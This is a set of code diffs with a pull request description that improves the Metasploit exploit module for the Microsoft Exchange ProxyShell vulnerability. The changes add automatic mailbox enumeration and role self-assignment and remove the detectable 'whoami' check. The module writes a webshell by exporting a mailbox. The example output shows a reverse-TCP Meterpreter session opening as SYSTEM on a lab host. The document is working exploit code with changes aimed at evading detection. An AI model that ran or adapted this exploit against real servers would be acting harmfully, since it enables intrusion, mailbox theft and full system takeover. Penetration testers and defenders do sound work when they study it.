+      return # rubocop:disable Lint/NonLocalExitFromIterator
     end
 
     fail_with(Failure::NoAccess, 'No user with the necessary management role was identified')
@@ -330,12 +337,12 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to enumerate email addresses from Active Directory') unless res&.code == 200
 
     mailbox_table = Rex::Text::Table.new(
-      'Header'     => 'Exchange Mailboxes',
-      'Columns'    => %w{ EmailAddress Name RoutingType MailboxType }
+      'Header' => 'Exchange Mailboxes',
+      'Columns' => %w[EmailAddress Name RoutingType MailboxType]
     )
-    xml_ns = {'t' => "http://schemas.microsoft.com/exchange/services/2006/types"}
+    xml_ns = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }
     res.get_xml_document.xpath('//t:Mailbox', xml_ns).each do |mailbox|
-      mailbox_table << %w{ t:EmailAddress t:Name t:RoutingType t:MailboxType }.map { |xpath| mailbox.xpath(xpath, xml_ns)&.text || '' }
+      mailbox_table << %w[t:EmailAddress t:Name t:RoutingType t:MailboxType].map { |xpath| mailbox.xpath(xpath, xml_ns)&.text || '' }
     end
 
     print_status("Enumerated #{mailbox_table.rows.length} email addresses")
@@ -406,7 +413,7 @@ class MetasploitModule < Msf::Exploit::Remote
       winrm.shell(:powershell) do |shell|
         shell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH)
         shell.extend(SSRFWinRMConnection::PowerShell)
-        shell.run({ cmdlet: cmdlet, args: args }) do |stdout, stderr|
+        shell.run({ cmdlet: cmdlet, args: args }) do |_stdout, stderr|
           successful &&= stderr.blank?
         end
       end
@@ -436,7 +443,7 @@ class MetasploitModule < Msf::Exploit::Remote
       unc_path = "\\\\\\\\#{@backend_server_name}\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\#{@shell_filename}"
     end
 
-    normal_path = unc_path.gsub(/^\\+[\w\.\-]+\\(.)\$\\/, '\1:\\')
+    normal_path = unc_path.gsub(/^\\+[\w.\-]+\\(.)\$\\/, '\1:\\')
     print_status("Writing to: #{normal_path}")
     register_file_for_cleanup(normal_path)
 
@@ -455,11 +462,11 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Waiting for the export request to complete...')
     30.times do
       sleep 5
-      if send_request_cgi('uri' => normalize_uri(web_directory, @shell_filename))&.code == 200
-        print_good('The mailbox export request has completed')
-        exported = true
-        break
-      end
+      next unless send_request_cgi('uri' => normalize_uri(web_directory, @shell_filename))&.code == 200
+
+      print_good('The mailbox export request has completed')
+      exported = true
+      break
     end
 
     fail_with(Failure::Unknown, 'The mailbox export request timed out') unless exported

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -414,7 +414,11 @@ class MetasploitModule < Msf::Exploit::Remote
         shell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH)
         shell.extend(SSRFWinRMConnection::PowerShell)
         shell.run({ cmdlet: cmdlet, args: args }) do |_stdout, stderr|
-          successful &&= stderr.blank?
+          unless stderr.blank?
+            successful = false
+            vprint_error('PSRP error received:')
+            vprint_line(stderr)
+          end
         end
       end
     rescue WinRM::WinRMError => e

--- a/modules/exploits/windows/http/exchange_proxyshell_rce.rb
+++ b/modules/exploits/windows/http/exchange_proxyshell_rce.rb
@@ -440,7 +440,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_file_for_cleanup(normal_path)
 
     @export_name = rand_text_alphanumeric(8..12)
-    execute_powershell(@common_access_token, 'New-MailboxExportRequest', args: [
+    successful = execute_powershell(@common_access_token, 'New-MailboxExportRequest', args: [
       { name: '-Name', value: @export_name },
       { name: '-Mailbox', value: @mailbox_user_email },
       { name: '-IncludeFolders', value: '#Drafts#' },
@@ -448,15 +448,20 @@ class MetasploitModule < Msf::Exploit::Remote
       { name: '-ExcludeDumpster' },
       { name: '-FilePath', value: unc_path }
     ])
+    fail_with(Failure::UnexpectedReply, 'The mailbox export request failed') unless successful
 
+    exported = false
     print_status('Waiting for the export request to complete...')
-    30.times do # todo: remove this command so a subprocess is not created for checking purposes
-      if execute_command('whoami')&.code == 200
+    30.times do
+      sleep 5
+      if send_request_cgi('uri' => normalize_uri(web_directory, @shell_filename))&.code == 200
         print_good('The mailbox export request has completed')
+        exported = true
         break
       end
-      sleep 5
     end
+
+    fail_with(Failure::Unknown, 'The mailbox export request timed out') unless exported
 
     print_status('Triggering the payload')
     case target['Type']


### PR DESCRIPTION
This makes the following improvements to the ProxyShell exploit:

1. The `EMAIL` datastore option is no longer required. When specified, it must still be an email address corresponding to a user with the necessary privileges. However, when the option is left blank, the module will now enumerate email addresses and check each one for the necessary privileges and carry on once a suitable one is found. The enumerated email addresses are stored as loot.
2. The `whoami` command is no longer used to determine if the webshell has successfully been written. This apparently [made it easily detectable](https://twitter.com/cyb3rops/status/1428675152548597763).
3. The created email draft is now deleted. It's moved to the Deleted Items folder, because apparently Exchange has a bunch of stuff around data retention so instantly deleting things permanently is sorta complicated.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/windows/http/exchange_proxyshell_rce`
- [x] Set the `RHOSTS` and `PAYLOAD` options, as well as any payload related options
- [x] Set `EMAIL` to a blank string, this should be the default but make sure it's blank to use the new functionality
- [x] Run the exploit and see it enumerate email addresses and ultimately deliver a payload

## Example

```
msf6 > use exploit/windows/http/exchange_proxyshell_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > set RHOSTS 192.168.159.42
RHOSTS => 192.168.159.42
msf6 exploit(windows/http/exchange_proxyshell_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/http/exchange_proxyshell_rce) > check
[+] 192.168.159.42:443 - The target is vulnerable.
msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Attempt to exploit for CVE-2021-34473
[*] Retrieving backend FQDN over RPC request
[*] Internal server name: win-bpid95acq7e.exchg.lan
[*] Enumerating valid email addresses and searching for one that either has the 'Mailbox Import Export' role or can self-assign it
[*] Enumerated 2 email addresses
[*] Saved mailbox and email address data to: /home/smcintyre/.msf4/loot/20210827174927_default_192.168.159.42_ad.exchange.mail_205456.txt
[+] Successfully assigned the 'Mailbox Import Export' role
[+] Proceeding with SID: S-1-5-21-2800676829-2777257591-1686523126-1000 (smcintyre@exchg.lan)
[*] Saving a draft email with subject 'ie1Y1uNnLfxL' containing the attachment with the embedded webshell
[*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\n7AB4NuOznEA.aspx
[*] Waiting for the export request to complete...
[+] The mailbox export request has completed
[*] Triggering the payload
[*] Sending stage (200262 bytes) to 192.168.159.42
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\n7AB4NuOznEA.aspx
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.42:7149) at 2021-08-27 17:49:40 -0400
[*] Removing the mailbox export request
[*] Removing the draft email

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : EXCHG
Logged On Users : 8
Meterpreter     : x64/windows
meterpreter >
```
